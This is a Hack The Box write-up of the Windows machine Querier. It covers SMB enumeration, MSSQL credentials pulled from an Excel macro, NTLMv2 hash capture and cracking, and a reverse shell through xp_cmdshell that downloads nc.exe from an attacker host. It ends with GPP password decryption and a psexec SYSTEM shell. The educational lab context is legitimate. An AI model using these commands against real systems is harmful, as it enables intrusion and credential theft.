Hack The Box - Querier

Quick Summary

Hey guys today Querier retired and here’s my write-up about it. It was a great windows machine covering some interesting stuff and I enjoyed it.I wrote two posts for this machine, first one solving it with kali and the other one solving it with commando vm, you can find the second post here. It’s a Windows box and its ip is 10.10.10.125 , I added it to /etc/hosts as querier.htb . Let’s jump right in!



Nmap

As always we will start with nmap to scan for open ports and services :

nmap -sV -sT -sC querier.htb



We got smb and mssql server on port 1433. Let’s check smb .

Smb

We need to list the shares first. I used smbclient :

1

2

3

4

5

6

7

8

9

10

11

12

smbclient --list //querier.htb/ -U ""

Enter WORKGROUP\'s password:



Sharename Type Comment

--------- ---- -------

ADMIN$ Disk Remote Admin

C$ Disk Default share

IPC$ IPC Remote IPC

Reports Disk

Reconnecting with SMB1 for workgroup listing.

do_connect: Connection to querier.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Failed to connect with SMB1 -- no workgroup available



Obviously if there’s an anonymously accessible share it will be Reports , Let’s see what’s in there :

1

2

3

4

5

6

7

8

9

root@kali:~/Desktop/HTB/boxes/querier# smbclient //querier.htb/Reports/ -U ""

Enter WORKGROUP\'s password:

Try "help" to get a list of possible commands.

smb: \> ls

. D 0 Mon Jan 28 18:23:48 2019

.. D 0 Mon Jan 28 18:23:48 2019

Currency Volume Report.xlsm A 12229 Sun Jan 27 17:21:34 2019



6469119 blocks of size 4096. 1608855 blocks available



Only an Excel file.

1

2

3

smb: \> get "Currency Volume Report.xlsm"

getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (17.1 KiloBytes/sec) (average 17.1 KiloBytes/sec)

smb: \>



1

2

root@kali:~/Desktop/HTB/boxes/querier# file Currency\ Volume\ Report.xlsm

Currency Volume Report.xlsm: Microsoft Excel 2007+



MSSQL Credentials from Report.xlsm

I checked the contents of the excel file by just viewing it as it will be opened with the archive manager :



in xl I found vbaProject.bin so I used olevba from oletools to see if I can get anything :



1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

root@kali:~/Desktop/HTB/boxes/querier# olevba Currency\ Volume\ Report.xlsm

olevba 0.54.2 on Python 2.7.16 - http://decalage.info/python/oletools

===============================================================================

FILE: Currency Volume Report.xlsm

Type: OpenXML

-------------------------------------------------------------------------------

VBA MACRO ThisWorkbook.cls

in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



' macro to pull data for client volume reports

'

' further testing required



Private Sub Connect()



Dim conn As ADODB.Connection

Dim rs As ADODB.Recordset



Set conn = New ADODB.Connection

conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"

conn.ConnectionTimeout = 10

conn.Open



If conn.State = adStateOpen Then



' MsgBox "connection successful"



'Set rs = conn.Execute("SELECT * @@version;")

Set rs = conn.Execute("SELECT * FROM volume;")

Sheets(1).Range("A1").CopyFromRecordset rs

rs.Close



End If



End Sub

-------------------------------------------------------------------------------

VBA MACRO Sheet1.cls

in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

(empty macro)

+----------+--------------------+---------------------------------------------+

|Type |Keyword |Description |

+----------+--------------------+---------------------------------------------+

|Suspicious|Open |May open a file |

|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |

| | |used to obfuscate strings (option --decode to|

| | |see all) |

+----------+--------------------+---------------------------------------------+



Great, we got connection credentials for the mssql server :

1

conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"



MSSQL

I used mssqlclient.py from impacket to connect to the server. First attempt failed :

1

2

3

4

5

6

root@kali:~/Desktop/HTB/boxes/querier# /opt/impacket/examples/mssqlclient.py reporting@querier.htb -db volume

Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation



Password:

[*] Encryption required, switching to TLS

[-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.



I added the windows authentication option ( -windows-auth ) and it worked :



Unfortunately … permission denied for xp_cmdshell :

1

2

3

4

5

SQL> enable_xp_cmdshell

[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.

[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.

[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.

[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.



I ran responder ( responder -I tun0 ) and used xp_dirtree to see what hashes can I catch :





1

2

3

4

5

6

7

8

9

[+] Listening for events...

[SMBv2] NTLMv2-SSP Client : 10.10.10.125

[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc

[SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER:53af3039d4607fd0:2423D19E432FFDDC2E4BF3B1E45272A5:0101000000000000C0653150DE09D201C11337A1C52B6EA7000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000030000051E8A512CD87D5811D02139C02C80CC4814E3213A0CCBD9EC4B588C8FCC85AD70A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310039002E0032003700000000000000000000000000

[*] Skipping previously captured hash for QUERIER\mssql-svc

[SMBv2] NTLMv2-SSP Client : 10.10.10.125

[SMBv2] NTLMv2-SSP Username : \gX

[SMBv2] NTLMv2-SSP Hash : gX:::1d968811d030fdad::

[*] Skipping previously captured hash for \gX



And we got the NTLMv2 hash for mssql-svc .

I used john and rockyou to crack the hash :

1

2

3

4

5

6

7

8

9

10

root@kali:~/Desktop/HTB/boxes/querier# john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash

Created directory: /root/.john

Using default input encoding: UTF-8

Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])

Will run 2 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

corporate568 (mssql-svc)

1g 0:00:00:07 DONE (2019-06-21 07:41) 0.1321g/s 1184Kp/s 1184Kc/s 1184KC/s correforenz..corby909

Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably

Session completed



Now it’s time to enable xp_cmdshell and get a reverse shell.





We have RCE . I ran a python server to host nc.exe then I used Invoke-WebRequest to download it :

1

2

3

4

SQL> EXEC xp_cmdshell 'powershell.exe Invoke-WebRequest -o C:\Users\mssql-svc\appdata\local\temp

c.exe http://10.10.xx.xx/nc.exe'

output

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

NULL



Then I got a reverse shell :

1

EXEC xp_cmdshell 'C:\Users\mssql-svc\appdata\local\temp

c.exe -e cmd.exe 10.10.xx.xx 1337'





We owned user !

GPP, Privilege Escalation, Root Flag

One of the things to check when enumerating Windows machines is group policy passwords which happened to be the privilege escalation vector here. I checked group policy passwords and found Administrator’s password :





Groups.xml :

1

2

3

< Groups clsid = "{3125E937-EB16-4b4c-9934-544FC6D24D26}" >

< User clsid = "{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name = "Administrator" image = "2" changed = "2019-01-28 23:12:48" uid = "{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext = "0" removePolicy = "0" policyApplied = "1" >

< Properties action = "U" newName = "" fullName = "" description = "" cpassword = "CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon = "0" noChange = "0" neverExpires = "1" acctDisabled = "0" userName = "Administrator" > </ Properties > </ User > </ Groups >



We still need to decrypt the password which can be easily done using gpp-decrypt :

1

2

3

root@kali:~/Desktop/HTB/boxes/querier# gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ

/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated

MyUnclesAreMarioAndLuigi!!1!



Password is MyUnclesAreMarioAndLuigi!!1! . We can use it with psexec.py from impacket and get a shell as system :

1

psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@querier.htb





And we owned root !

That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham

Thanks for reading.

Second write-up : Hack The Box - Querier (Commando)

Previous Hack The Box write-up : Hack The Box - Flujab

Next Hack The Box write-up : Hack The Box - Netmon